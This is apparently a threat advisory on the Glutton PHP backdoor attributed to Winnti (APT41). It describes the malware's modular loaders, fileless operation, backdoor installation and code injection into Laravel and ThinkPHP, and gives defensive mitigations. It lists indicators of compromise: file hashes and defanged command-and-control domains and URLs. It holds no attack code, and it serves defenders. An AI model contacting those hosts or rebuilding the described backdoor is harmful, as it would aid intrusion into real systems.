Winnti Group Unleashes Advanced PHP Backdoor Glutton

Threat Group: Winnti (APT41)
Threat Type: PHP-Based Backdoor Malware
Exploited Vulnerabilities: Known vulnerabilities in PHP frameworks (Laravel, ThinkPHP)
Malware Used: Glutton, ELF-based Winnti backdoor
Threat Score: High (8.5/10) – Due to its advanced modular design, stealth capabilities, and targeting of both legitimate and cybercriminal systems.
Last Threat Observation: December 17, 2024

Overview

Glutton is a sophisticated PHP-based backdoor malware recently identified in cyber attacks targeting various countries, including China, the United States, Cambodia, Pakistan, and South Africa. Attributed to the Chinese advanced persistent threat (APT) group known as Winnti (also referred to as APT41), Glutton exhibits a modular architecture that enables it to perform a range of malicious activities, including data exfiltration, backdoor installation, and code injection into popular PHP frameworks such as Laravel and ThinkPHP.

First detected in late April 2024 by cybersecurity researchers at QAX's XLab, Glutton has been active since at least December 2023. Its deployment reflects a strategic shift by the Winnti group towards exploiting vulnerabilities within the cybercrime ecosystem itself. Notably, Glutton has been used to compromise systems operated by other cybercriminals, effectively turning their tools against them in a "no honor among thieves" scenario.

Key Details

• Delivery Method: Exploitation of known vulnerabilities in PHP frameworks; distribution of pre-compromised business systems embedded with malicious code.
• Target: Systems running PHP frameworks, particularly those used in IT services, business operations, and social security sectors.
• Functions:
  • Data Exfiltration: Harvests system information, including OS versions, PHP versions, and sensitive data from Baota panels.
  • Backdoor Installation: Deploys both ELF-based and PHP-based backdoors to maintain persistent access.
  • Code Injection: Injects malicious code into popular PHP frameworks to facilitate further exploitation.
  • Obfuscation: Operates within PHP or PHP-FPM processes to avoid leaving file-based payloads, enhancing stealth.

Attack Vectors

Glutton employs a modular framework that allows it to adapt to various environments and execute a series of tasks to compromise targeted systems. The primary components include:

1. task_loader: Assesses the execution environment and downloads the appropriate next-stage payload.
2. init_task: Performs critical tasks such as installing the ELF-based Winnti backdoor, modifying Baota panels, and infecting PHP files.
3. client_loader: A refactored version of init_task with additional features, including the deployment of a PHP-based backdoored client.
4. client_task: Manages the PHP backdoor and periodically fetches additional payloads.

The malware's infection vector includes exploiting known vulnerabilities in widely used PHP frameworks and distributing pre-compromised business systems embedded with malicious code. This approach broadens its reach and facilitates the targeting of specific industries.

Known Indicators of Compromise (IoCs)

• File Hashes (MD5):
  • 17dfbdae01ce4f0615e9a6f4a12036c4
  • 8fe73efbf5fd0207f9f4357adf081e35
  • 722a9acd6d101faf3e7168bec35b08f8
  • f8ca32cb0336aaa1b30b8637acd8328d
  • 00c5488873e4b3e72d1ccc3da1d1f7e4
  • ac290ca4b5d9bab434594b08e0883fc5
• Domains:
  • cc.thinkphp1[.]com
  • v6.thinkphp1[.]com
  • v20.thinkphp1[.]com
  • jklwang[.]com
• URLs:
  • v6.thinkphp1[.]com/php?
  • v20.thinkphp1[.]com/v20/init?
  • v20.thinkphp1[.]com/v20/fetch?

Mitigation and Prevention

• User Awareness: Educate users about the risks associated with downloading and installing software from untrusted sources, especially in forums known for distributing cybercrime tools.
• Email Filtering: Implement robust email filtering to block phishing attempts that may serve as an initial infection vector.
• Antivirus Protection: Deploy advanced antivirus solutions capable of detecting PHP-based malware and monitor for unusual behaviors indicative of fileless malware.
• Two-Factor Authentication (2FA): Enforce 2FA on all critical systems to prevent unauthorized access, even if credentials are compromised.
• Monitor Logs: Regularly review server and application logs for signs of unusual activity, such as unexpected PHP process executions or unauthorized modifications to PHP files.
• Regular Updates: Ensure all systems, especially those running PHP frameworks like Laravel and ThinkPHP, are updated promptly to patch known vulnerabilities.

Risk Assessment

Glutton represents a significant threat due to its advanced modular design, stealth capabilities, and the strategic shift of targeting both legitimate systems and those operated by other cybercriminals. Its ability to operate filelessly within PHP processes makes detection challenging, and the deployment of both ELF-based and PHP-based backdoors provides multiple avenues for persistent access. The lack of encrypted C2 communications and use of plaintext code suggest a trade-off between operational complexity and stealth, but these factors do not diminish the overall risk posed by this malware.

Conclusion

The emergence of Glutton underscores the evolving tactics of APT groups like Winnti, highlighting their willingness to target both traditional victims and fellow cybercriminals to achieve their objectives. This development calls for heightened vigilance and the implementation of robust security measures to detect and mitigate such threats effectively.

Sources:

• The Hacker News - New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP -
• Cyberscoop - PHP backdoor looks to be work of Chinese-linked APT group
• Bleeping Computer - Winnti hackers target other threat actors with new Glutton PHP backdoor